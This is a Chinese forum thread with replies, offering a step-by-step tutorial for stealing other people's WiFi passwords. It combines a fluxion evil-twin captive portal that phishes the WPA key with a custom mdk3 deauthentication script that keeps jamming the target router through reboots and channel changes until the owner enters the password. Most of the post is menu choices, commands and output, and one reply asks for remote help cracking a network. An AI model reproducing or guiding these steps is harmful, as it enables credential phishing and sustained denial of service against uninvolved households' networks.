ubnt解决方案
查看: 12430|回复: 55

【2022新版】使用fluxion软件WiFi钓鱼+脚本肉机攻击获取密码教程

[复制链接]

40

回帖

1220

积分

434 小时

在线时间

上尉

注册时间
2022-9-3
金币
1112 个
威望
2 个
荣誉
0 个
累计签到:5 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2022-9-3 14:06 |显示全部楼层
本帖最后由 qsdelol12 于 2022-9-3 14:34 编辑

  • ​环境准备
虚拟机开机密码 :  1
硬件装备:电脑一台,内存8G,硬盘空闲60G,网卡:两张2.4G频段网卡如3070,一张5G频段网卡,淘宝去买搜索【kali网卡5G】

相关软件包下载:
**************************************************************************************************
「kali-i386-share-ver-no-script-2022」等文件 https://www.aliyundrive.com/s/F4Ya3e6gj5q 提取码: 3t3o点击链接保存,或者复制本段内容,打开「阿里云盘」
**************************************************************************************************

由于阿里云盘分享限制,压缩包格式已经过伪装,下载后需用win10及以上系统运行以下解析程序解析出真正的格式【下载开始时和下载完成后别随便改文件名称,否则解析失败】
解析后,解压直接用VMware打开该虚拟机即可,啥环境都已经安装好了,开箱即用


2.【破解步骤1  创建钓鱼热点,此步骤网上教程一大把,以下为参考】
连接网卡【钓鱼用3070网卡钓2.4G网络】
1. 进入虚拟机桌面鼠标左键双击【wifi-hack】文件夹,找到并打开【fluxion5.9】文件夹
2. 右键单击在这里打开终端
3. 输入 : [sudo su] 回车提取root权限
sudo su
4. 执行命令  [./fluxion.sh]  回车
./fluxion.sh
5.这里选择  [2]
***********************************************************
请选择一个攻击方式
                                     ESSID: "[N/A]" / [N/A]
                                    Channel:  [N/A]
                                      BSSID:  [N/A] ([N/A])
        [1] 专属门户 创建一个“邪恶的双胞胎”接入点。
         [2] Handshake Snooper 检索WPA/WPA2加密散列。
         [3] 返回


***********************************************************
6. 这里选择 [1]
***********************************************************
选择要扫描的信道
        [1] 扫描所有信道  (2.4GHz)
         [2] 扫描所有信道  (5GHz)
         [3] 扫描所有信道  (2.4GHz & 5Ghz)
         [4] 扫描指定信道
         [5] 返回
**********************************************************
7. 看见弹出扫描WiFi信息差不多了就关掉它
8. 选择一个你要破解的WiFi的序号,回车【绿色代表有人上网,可轻松抓包】
9. 这里选择  [2] 跳过
**********************************************************
为目标跟踪选择无线接口.
可能需要选择专用接口.
如果您不确定,请选择"跳过"!
[1] wlan0    Ralink Technology, Corp. RT5370
[2] 跳过
[3] 重试
[4] 返回
**********************************************************
10. 这里选择   [2]
**********************************************************
此攻击已经配置完毕
        [1] 恢复攻击
         [2] 重置攻击
*********************************************************
11. 这里选择 [3]
*********************************************************
选择一种方式来检查握手包获取状态
        [1] 监听模式 (被动)
         [2] aireplay-ng 解除认证方式 (侵略性)
         [3] mdk3 解除认证方式 (侵略性)
         [4] 返回
********************************************************
12. 这里选择 [3]
********************************************************
选择Hash的验证方法
        [1] pyrit 验证
         [2] aircrack-ng 验证 (不推荐)
         [3] cowpatty 验证 (推荐用这个)
         [4] 返回
********************************************************
13. 这里选择 [1]
********************************************************
每隔多久检查一次握手包
        [1] 每30秒钟 (推荐).
         [2] 每60秒钟
         [3] 每90秒钟
         [4] 返回
*******************************************************
14. 这里选择 [2]
*******************************************************
如何进行验证?
        [1] Asynchronously (fast systems only).
         [2] Synchronously (推荐).
         [3] 返回
*******************************************************
15. 等抓到包了,吧左下角的那个窗口手动关掉
16. 这里选择  [1]
*******************************************************
Handshake Snooper 正在进行攻击......
        [1] 选择启动攻击方式
         [2] 退出
*******************************************************
17. 这里选择  [1]
*******************************************************
请选择一个攻击方式
                                     ESSID: "CU_NEFe" / WPA2
                                    Channel:  5
                                      BSSID:  34:78:398:86:90 ([N/A])
        [1] 专属门户 创建一个“邪恶的双胞胎”接入点。
         [2] Handshake Snooper 检索WPA/WPA2加密散列。
         [3] 返回
*******************************************************
18. 这里输入  [y]  回车
*******************************************************
Fluxion正在瞄准上面的接入点.
继续这个目标? [Y/n]
*******************************************************
19. 这里选择 [2]
*******************************************************
为目标跟踪选择无线接口.
可能需要选择专用接口.
如果您不确定,请选择"跳过"!
[1] wlan0    Ralink Technology, Corp. RT5370
[2] 跳过
[3] 重试
[4] 返回
******************************************************
20. 这里选择  [2]
******************************************************
此攻击已经配置完毕
        [1] 恢复攻击
         [2] 重置攻击
******************************************************
21. 这里选择 [2]
******************************************************
为接入点选择一个接口
[1] eth0     [-] Advanced Micro Devices, Inc. [AMD] 79c970 [PCnet32 LANCE] (rev 10)
[2] wlan0    Ralink Technology, Corp. RT5370
[3] 重试
[4] 返回
******************************************************
22. 这里选择  [1]
********************************************************
选择一个接入点
                                     ESSID: "CU_NEFe" / WPA2
                                    Channel:  5
                                      BSSID:  34:78:398:86:90 ([N/A])
        [1] 流氓 AP - hostapd (推荐)
         [2] 流氓 AP - airbase-ng (缓慢)
         [3] 返回
********************************************************
23. 这里选择 [1]
********************************************************
发现目标热点的Hash文件.
你想要使用这个文件吗?
        [1] 使用抓取到的hash文件
         [2] 指定hash路径
         [3] 握手包目录(重新扫描)
         [4] 返回
*******************************************************
24. 这里选择 [3]
*******************************************************
选择Hash的验证方法
                                     ESSID: "CU_NEFe" / WPA2
                                    Channel:  5
                                      BSSID:  34:78:398:86:90 ([N/A])
        [1] pyrit 验证
         [2] aircrack-ng 验证 (不推荐)
         [3] cowpatty 验证 (推荐用这个)
         [4] 返回
*********************************************************
25. 这里选择 [1]
*********************************************************
选择钓鱼认证门户的SSL证书来源
        [1] 创建SSL证书
         [2] 检测SSL证书 (再次搜索)
         [3] 没有证书 (disable SSL)
         [4] 返回
*********************************************************
26. 这里选择  [1]
*********************************************************
为流氓网络选择Internet连接类型
        [1] 断开原网络 (推荐)
         [2] 仿真
         [3] 返回
*********************************************************
27. 这里输入  [3]  回车
*********************************************************
选择钓鱼热点的认证网页界面
                                   ESSID: "CU_NEFe" / WPA2
                                  Channel:  5
                                    BSSID:  34:78:398:86:90 ([N/A])
                        [01] 通用认证网页                               Arabic
                         [02] 通用认证网页                            Bulgarian
                         [03] 通用认证网页                              Chinese
**********************************************************
28. 等一小哈钓鱼WiFi就创建好了...
[一共有  6  个小的弹窗  ]
[如果这些弹窗消失了,表示钓鱼成功,密码会在屏幕上提示给你..]
29. 钓鱼成功页面
【密码位置:/home/kali/桌面/wifi-hack/fluxion-full-ver-qq-qun/fluxion-5.9/attacks/Captive\ Portal/netlog/xxx-xxx-xxx.log】





3.【破解步骤2  运行自动化脚本攻击目标WiFi “双频路由器需要2台机器一起攻击,一台攻击2.4G,另一台攻击5G让目标主人完全无法使用WiFi”】
**********************************************************************************
*                                                                                                                                            *
*                                              本教程重头戏                                                                          *
*                                            直接决定成功率                                                                         *
*                                                                                                                                            *
**********************************************************************************
连接网卡【攻击网卡:3070网卡攻击2.4G网络。5G网卡攻击5G网络】
1. 打开其它的虚拟机

2. 鼠标左键单击桌面的 [wifi-hack] 文件夹 ,,, 然后 鼠标右键单击在这里打开终端
3. 输入 [sudo su] 提取root权限
sudo su
4. 查看网卡【无线网卡一般叫wlan0..wlan1...等等】
ip a
5. 把无线网卡设置为监听模式
airmon-ng check kill
airmon-ng start wlan0
【备用命令】
airmon-ng check kill
ip link set wlan0 down
iw dev wlan0 set type monitor
ip link set wlan0 up

6. 再次查看网卡信息 [wlan0mon 就是监听模式下网卡的名字,记住它]
ip a
********************************************************
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
     link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
     inet 127.0.0.1/8 scope host lo
        valid_lft forever preferred_lft forever
     inet6 ::1/128 scope host
        valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
     link/ether 00:0c:29:4d:4c:33 brd ff:ff:ff:ff:ff:ff
     inet 192.168.255.128/24 brd 192.168.255.255 scope global dynamic noprefixroute eth0
        valid_lft 953sec preferred_lft 953sec
     inet6 fe80::20c:29ff:fe4d:4c33/64 scope link noprefixroute
        valid_lft forever preferred_lft forever
6: wlan0mon: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UNKNOWN group default qlen 1000
     link/ieee802.11/radiotap c8:3a:35:d0:c5:66 brd ff:ff:ff:ff:ff:ff
********************************************************

7. 查看攻击脚本
ll
*********************************************************
总用量 12
-rw-r--r-- 1 kali kali 10868  8月 27 16:58 hack_wifi_by_mdk_new.sh
********************************************************
8. 扫描一下WiFi信号,, 差不多了就键盘按下 [Ctrl + c] 组合键 结束扫描
[2.4G]  这是扫描2.4G信号的命令
airodump-ng wlan0mon --band bg
[5G]  这是扫描5G的
airodump-ng wlan0mon --band a
*******************************************************
CH 14 ][ Elapsed: 12 s ][ 2022-08-27 18:11
BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID
5CE:34:AE:D3:CD  -72        1        1    0   6  540   WPA2 CCMP   PSK  CMCC-fkVY
  34:78:39:D8:86:90  -49        7        0    0   5  130   WPA2 CCMP   PSK  CU_NEFe
  34:CE:00:2C:B9:A0  -59        8       33    0  10  130   WPA2 CCMP   PSK  &#127815;
******************************************************
找到你【破解步骤1】钓鱼的那个WiFi的MAC地址并复制下来
9. 运行脚本开启自动化攻击
[注意网卡的名字,和上一步扫描出来的WiFi的MAC地址  ,,别写错了]
bash hack_wifi_by_mdk_new.sh wlan0mon 02:3A:7C:6A:83:DB
10. 这里输入的是探测对方路由器是否重启的间隔时间 [推荐 300 秒,,就是每5分钟探测一次对方路由器是否重启过,也可以自定义你喜欢的时间,但是建议必须大于60秒效果才好]
******************************************************
How long do you want zhe hack WIFI inervel time [sec]:
******************************************************
11. 这里看你攻击的WiFi是2.4G还是5G,对应选择就行了【注意:5G需要支持5G的网卡,如8812au】
******************************************************
Select one type what you want to hack
************************************
1.        2.4G                              *
2.        5G                                 *
************************************
Please select: 1
******************************************************
12. 到这里自动攻击就开始了,对方直接不能用WiFi了【重启路由器**也没用**】  ......
13. 观察左上角的红色弹窗,如果在跑就表示一直在攻击。。。





4.【破解步骤3  定期观察钓鱼状态】
隔一段时间观察一下钓鱼的那台虚拟机,如果6个小的弹窗消失了,说明钓鱼成功,根据提示去看密码就行 .......记得回来把攻击脚本停止掉
小提示:看手机WiFi列表,如果钓鱼WiFi信号消失了也证明钓鱼成功,赶快去钓鱼那台虚拟机查看密码吧,记得关掉攻击脚本哦!!不然主人可能就要上门拜访您了


注意:这款破解手段比较残忍、粗暴、耗时。几小时,几分钟,几天不等。。。
如果主人受不了攻击,破防了那会非常快得到密码

如何让主人快速破防?开启脚本无差别自动化攻击即可,即使主人重启路由器信道发生改变,该脚本也会捕获新的信道并重新攻击,迫使加快他上钩给出密码,这是这款脚本的可怕之处,定期嗅探目标路由器的信道变化并加以攻击,如果对方把路由器关机,那么这款脚本就会每10分钟嗅探一次,一旦嗅探到路由器开机就会立即开启攻击 !!!!!!

假如不使用脚本,主人重启路由器,信道变化了,那么你得手动调整信道进行洪水攻击,而且你不知道主人啥时候重启了路由器对不对,只能定期手动扫描WiFi看看信道变成了什么,再手动调整攻击命令使攻击生效,有了脚本就不需要你操心了,它会帮你解决自动化攻击,重启路由器也逃不过!!!!全过程都是自动化的~~~~

总结:巧用自动化攻击脚本,B站up主:【奥力元给力奥】  让你不管到哪都能连接WiFi,欢迎━(*`&#8704;′*)ノ亻!  一键三连 !!!!!

温馨提醒:切勿将脚本用于恶意攻击等非法用途,否则一切后果自负!!!
&#8203;



40

回帖

1220

积分

434 小时

在线时间

上尉

注册时间
2022-9-3
金币
1112 个
威望
2 个
荣誉
0 个
累计签到:5 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2022-9-6 08:24 |显示全部楼层
hststb 发表于 2022-9-6 08:05
他也不知道,因为文章是剽窃的,

xterm的-e 参数后面跟的什么你了解吗?awk如何提取需要的字段你了解吗?shell如何进行流程控制你了解吗?airodump-ng的-w参数后面的路径下会生成几个文件,那些文件存放什么信息你了解过吗?mdk3与mdk4的-c参数默认切换信道时间分别是多少你了解过吗?

把以上基本的东西弄清楚再来bb
回复

使用道具 举报

1352

回帖

1万

积分

2232 小时

在线时间

上校

注册时间
2016-11-13
金币
14014 个
威望
7 个
荣誉
1 个
累计签到:1380 天
连续签到:1 天
[LV.1825]无线元老
发表于 2022-9-3 20:11 |显示全部楼层
看不到图片啊,只有我是这样的吗?
回复

使用道具 举报

40

回帖

1220

积分

434 小时

在线时间

上尉

注册时间
2022-9-3
金币
1112 个
威望
2 个
荣誉
0 个
累计签到:5 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2022-9-3 23:16 |显示全部楼层
无线爱好者学徒 发表于 2022-9-3 20:11
看不到图片啊,只有我是这样的吗?

新人贴,上传不了图片~~  讲究看吧。。。功能还是很给力的呢
回复

使用道具 举报

202

回帖

2656

积分

669 小时

在线时间

少校

注册时间
2019-7-18
金币
2387 个
威望
0 个
荣誉
0 个
累计签到:5 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2022-9-4 07:43 |显示全部楼层
能远程安装帮助破解一个吗?
回复

使用道具 举报

40

回帖

1220

积分

434 小时

在线时间

上尉

注册时间
2022-9-3
金币
1112 个
威望
2 个
荣誉
0 个
累计签到:5 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2022-9-4 09:32 |显示全部楼层
本帖最后由 qsdelol12 于 2022-9-6 18:05 编辑
无线爱好者66 发表于 2022-9-4 07:43
能远程安装帮助破解一个吗?

有网卡吗?3070两个,8812au一个
回复

使用道具 举报

202

回帖

2656

积分

669 小时

在线时间

少校

注册时间
2019-7-18
金币
2387 个
威望
0 个
荣誉
0 个
累计签到:5 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2022-9-4 14:16 |显示全部楼层
有,笔记本电脑自带网卡一个,3070和8187l各一个
回复

使用道具 举报

202

回帖

2656

积分

669 小时

在线时间

少校

注册时间
2019-7-18
金币
2387 个
威望
0 个
荣誉
0 个
累计签到:5 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2022-9-4 14:18 |显示全部楼层
电脑配置:win 10,内存8g,内置硬盘1t,还需要什么?
回复

使用道具 举报

202

回帖

2656

积分

669 小时

在线时间

少校

注册时间
2019-7-18
金币
2387 个
威望
0 个
荣誉
0 个
累计签到:5 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2022-9-4 14:21 |显示全部楼层
抓住了握手包,跑跑普通包和金刚包没出
回复

使用道具 举报

40

回帖

1220

积分

434 小时

在线时间

上尉

注册时间
2022-9-3
金币
1112 个
威望
2 个
荣誉
0 个
累计签到:5 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2022-9-4 14:49 |显示全部楼层
无线爱好者66 发表于 2022-9-4 14:16
有,笔记本电脑自带网卡一个,3070和8187l各一个

加我扣   一七二五零九九六三八
回复

使用道具 举报

461

回帖

4208

积分

341 小时

在线时间

少校

太平绅士

注册时间
2008-6-10
金币
3606 个
威望
4 个
荣誉
3 个
累计签到:365 天
连续签到:1 天
[LV.365]无线熟人
发表于 2022-9-4 21:07 |显示全部楼层
hack_wifi_by_mdk_new.sh在哪里下载?
回复

使用道具 举报

156

回帖

848

积分

112 小时

在线时间

中尉

注册时间
2019-8-2
金币
663 个
威望
1 个
荣誉
0 个
累计签到:19 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2022-9-5 10:51 来自手机 |显示全部楼层
大弟呀,那个钓鱼软件不好用你没发现吗,再就是你伪装了WiFi也不好使,最关键的是把目标路由器打死才可以钓鱼,
回复

使用道具 举报

40

回帖

1220

积分

434 小时

在线时间

上尉

注册时间
2022-9-3
金币
1112 个
威望
2 个
荣誉
0 个
累计签到:5 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2022-9-5 11:28 |显示全部楼层
本帖最后由 qsdelol12 于 2022-9-5 11:44 编辑
hststb 发表于 2022-9-5 10:51
大弟呀,那个钓鱼软件不好用你没发现吗,再就是你伪装了WiFi也不好使,最关键的是把目标路由器打死才可以钓 ...

已经自研了脚本解决,自动化攻击。话说你眼瞎吗?没看完文章就在这回复,无语!
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册 微信登录

本版积分规则

站点统计 | Archiver | 手机版 | 无线门户 ( 粤ICP备11076993号|粤公网安备44010602008359号 ) |网站地图

GMT+8, 2024-12-19 23:33

返回顶部 返回列表